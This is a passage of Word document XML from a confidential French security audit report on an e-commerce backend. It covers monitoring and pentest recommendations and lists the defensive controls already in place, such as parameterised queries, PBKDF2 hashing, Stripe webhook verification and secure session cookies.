        <w:t>Mettre en place des alertes Cloudflare Analytics sur les erreurs 401/403 anormales sur /api/admin/login (indicateur d'attaque brute-force en cours). Cloudflare Workers Logs permet d'exporter les logs vers un SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Tests de sécurité automatisés : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Compléter cet audit statique par un pentest dynamique (DAST) avant le lancement commercial, notamment sur les flux de paiement Stripe et les endpoints d'authentification.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1614"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>6. Points de sécurité positifs identifiés</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Les éléments suivants témoignent d'une bonne culture de sécurité et ne doivent pas être modifiés sans analyse approfondie :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Requêtes SQL paramétrées (D1 prepared statements) — aucune injection SQL possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Hachage PBKDF2-SHA256 avec 100 000 itérations et sel aléatoire pour les mots de passe utilisateurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vérification cryptographique du webhook Stripe (constructEventAsync) — protection contre les faux webhooks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Cookies de session HttpOnly + Secure + SameSite=Strict — protection XSS et CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Protection anti-timing sur le login utilisateur (DUMMY_HASH exécuté même si l'email n'existe pas).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Revalidation des prix côté serveur au checkout (computeUnitPriceFromSelections) — price tampering impossible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Validation du productId par regex et vérification contre le catalogue au checkout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Idempotence Stripe webhook (INSERT OR IGNORE) — double traitement de commande impossible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Upload token signé par HMAC-SHA256 — impossible à forger sans AUTH_SECRET.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Limitation de la taille d'upload (5 Mo) et liste blanche d'extensions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rapport généré le 03/05/2026 — CONFIDENTIEL — Axion Pad</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